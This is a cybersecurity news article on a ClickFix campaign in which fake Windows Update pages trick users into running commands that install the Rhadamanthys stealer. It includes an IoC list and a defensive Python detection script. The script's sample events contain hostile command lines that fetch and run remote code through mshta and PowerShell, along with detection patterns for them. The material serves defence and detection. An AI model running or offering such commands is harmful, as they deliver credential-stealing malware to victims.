New ClickFix Malware Campaign Targets Windows Users with Fake Updates

Redazione RHC, 25 November 2025 11:38

Fake Windows updates have entered a new round of ClickFix campaigns, as reported by Huntress. Attackers are increasingly replacing the fake bot-check ("verify you are human") prompts of earlier lures with full-screen blue windows that simulate a system update.

Microsoft notes that ClickFix has become the most common initial access technique, and that many groups with varying levels of expertise have adopted it.

The attack begins when the victim visits a malicious website that switches the browser to full-screen mode and displays a page that superficially resembles the Windows Update interface.

The victim is prompted to "install" the critical update manually, following the standard ClickFix pattern: open the Run dialog with Win+R, paste the command the page has prepared, and press Enter. At that point the user has started the malicious chain themselves.

The pasted command invokes mshta.exe with a URL in which the second octet of the IP address is always written in hexadecimal. The script served at that URL hands off to PowerShell, which downloads a .NET snippet; after decryption the snippet is loaded directly into memory and passes control to the next component, a .NET module responsible for delivering the malware stealthily via steganography. That module extracts encrypted Donut shellcode from the pixel data of PNG files, reading individual color channels to reconstruct the payload. Because the payload never touches disk as a recognizable executable, this approach helps evade signature-based protection.

According to Huntress, between September 29 and October 30, 2025 the team analyzed 76 incidents affecting organizations in the US, EMEA, and APJ regions. One of them involved traffic to 141.98.80[.]175. In every case the chain used a URL with a hexadecimal second octet that led to the steganographic downloader. The researchers found Russian-language comments in the source code of the fake update pages but could not attribute the campaign.

Although Operation Endgame targeted Rhadamanthys infrastructure on November 13, websites hosting the fake updates remained online until at least November 19.

All of the decoys found referenced the same hexadecimal-encoded URL structure previously associated with Rhadamanthys distribution, although the malware itself was no longer hosted on those sites. Researchers warn, however, that the infrastructure can change quickly.

Both variants of the lure ultimately downloaded Rhadamanthys, an information stealer that harvests user credentials, onto the victims' devices.

To reduce the risk of such attacks, block the Run dialog where users do not need it (the "Remove Run menu from Start Menu" Group Policy setting also disables Win+R), teach employees what ClickFix prompts look like, and remind them that no legitimate update requires typing commands manually. Note that blocking Run is a partial mitigation: the same command can be pasted into a terminal or the File Explorer address bar, so detection still matters. At the EDR level, alert when explorer.exe spawns mshta.exe, powershell.exe, or other executables with unusual arguments, such as a URL or a hidden-window or execution-policy-bypass switch.
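The two detection ideas above, the explorer.exe-to-script-host parent/child pattern and the hexadecimal-octet URL, can be written as a small triage rule over process-creation telemetry. The following is an added example, not code from Huntress or from the article: it runs over constructed events shaped like Sysmon Event ID 1 fields (parent image, child image, command line), flags Run-dialog-style launches with unusual arguments, and normalizes IPs written with 0x octets back to dotted decimal so they can be matched against a plain IoC list. Only the IP 141.98.80.175 comes from the article (98 is 0x62); the paths, arguments and the second IP are assumptions for illustration.

```python
import re

# Constructed sample process-creation events, shaped like the fields Sysmon
# Event ID 1 records (parent image, child image, child command line). They are
# illustrative, not telemetry from the campaign. Only the IP 141.98.80.175 comes
# from the article; it is written below with its second octet in hex (0x62 == 98)
# to mirror the URL pattern the report describes. Paths and arguments are made up.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" http://141.0x62.80.175/update'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -w hidden -ep bypass -c "iex (irm http://10.0x0a.0.1/p)"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r'"C:\Windows\System32\notepad.exe" C:\Users\alice\notes.txt'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'},
]

# Interpreters and download helpers a Run-dialog lure typically invokes.
LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe",
           "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe"}
# Known C2 from the article (defanged there as 141.98.80[.]175), dotted decimal.
KNOWN_C2 = {"141.98.80.175"}

# An IPv4 literal whose octets may be plain decimal or 0x-prefixed hex.
OCTET = r"(?:0x[0-9a-f]{1,2}|\d{1,3})"
HEX_IP_RE = re.compile(rf"(?<![\w.]){OCTET}(?:\.{OCTET}){{3}}(?![\w.])", re.I)
# Arguments that are unusual for a user-typed launch of a shell or script host.
SUSPICIOUS_ARGS = re.compile(
    r"https?://|-w(?:indowstyle)?\s+hidden|-e(?:p|xecutionpolicy)\s+bypass|"
    r"-enc(?:odedcommand)?\b|\biex\b|\birm\b|downloadstring", re.I)


def normalize_ip(token):
    """Rewrite an IP with 0x-hex octets (e.g. 141.0x62.80.175) to dotted decimal.
    Returns None if any octet is out of range."""
    octets = []
    for part in token.split("."):
        value = int(part, 16) if part.lower().startswith("0x") else int(part)
        if value > 255:
            return None
        octets.append(str(value))
    return ".".join(octets)


def hex_encoded_ips(cmdline):
    """Return (as_written, decimal) for every IP literal that uses a hex octet."""
    hits = []
    for match in HEX_IP_RE.finditer(cmdline):
        token = match.group(0)
        if "0x" not in token.lower():
            continue  # plain dotted-decimal IPs are not the tell here
        decimal = normalize_ip(token)
        if decimal:
            hits.append((token, decimal))
    return hits


def evaluate(event):
    """Return (severity, reason) findings for one process-creation event."""
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    image = event["image"].rsplit("\\", 1)[-1].lower()
    cmdline = event["cmdline"]
    findings = []
    for written, decimal in hex_encoded_ips(cmdline):
        if decimal in KNOWN_C2:
            findings.append(("high", f"hex-encoded IP {written} -> {decimal} matches known IoC"))
        else:
            findings.append(("medium", f"hex-encoded IP {written} -> {decimal} (obfuscated host)"))
    if parent == "explorer.exe" and image in LOLBINS:
        if image == "mshta.exe" or SUSPICIOUS_ARGS.search(cmdline):
            findings.append(("high", f"explorer.exe launched {image} with unusual arguments (Run dialog pattern)"))
        else:
            # Users do open PowerShell or cmd from the shell; a bare launch is only a low-priority note.
            findings.append(("low", f"explorer.exe launched {image}"))
    return findings


def scan(events):
    """Map event index -> highest severity among its findings, for triage ordering."""
    rank = {"low": 1, "medium": 2, "high": 3}
    summary = {}
    for index, event in enumerate(events):
        findings = evaluate(event)
        if findings:
            summary[index] = max(findings, key=lambda f: rank[f[0]])[0]
    return summary


if __name__ == "__main__":
    for index, event in enumerate(SAMPLE_EVENTS):
        for severity, reason in evaluate(event):
            print(f"event {index} [{severity}] {reason}")
```

Two design points are worth keeping when porting this to a real EDR or SIEM query. First, explorer.exe is the parent of every Start-menu and Run-dialog launch, so the parent/child pair alone is noisy for powershell.exe and cmd.exe; the argument check is what turns it into an alert, while mshta.exe launched from the shell is rare enough to flag on its own. Second, hex-octet normalization is cheap and lets the same IoC list catch a URL however its octets are written, which matters because the campaign's sites kept the URL structure even after the malware moved.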

The following IoCs (SHA-256 hashes) are drawn from the intelligence platform of Recorded Future, a strategic partner of Red Hot Cyber and a global leader in cyber threat intelligence.

  • 08c7fb6067acc8ac207d28ab616c9ea5bc0d394956455d6a3eecb73f8010f7a2
  • 9950788284df125c7359aeb91435ed24d59359fac6a74ed73774ca31561cc7ae
  • 34d025ef57eb3f484301744e2b2488ae0ac76f2e226585e65bb45edbbb6b7f69
  • 471c981c11df004b941dad0175bc435f9c901bcb968ba9582f1a2181443d9ef4
  • 03c72cfabace07b6787d2d1fd66d6d6d9a2fbcb74a827ca4ab7e59aba40cb306
  • 81b179b050a13d5664e0d88143154bd3fc127f9ac3e7a6c16444caac1d3ab13c
  • aba1e62ee9a460f5b7b67198dc22612b275a1e871d56c60324190ad69323ddf0

  • clickfix
  • cyber attack
  • cybersecurity threats
  • fake updates
  • malware campaign
  • Rhadamanthys
  • security measures
  • threat protection
  • Windows malware
  • Windows users
Redazione
The editorial team of Red Hot Cyber consists of a group of individuals and anonymous sources who actively collaborate to provide early information and news on cybersecurity and computing in general.
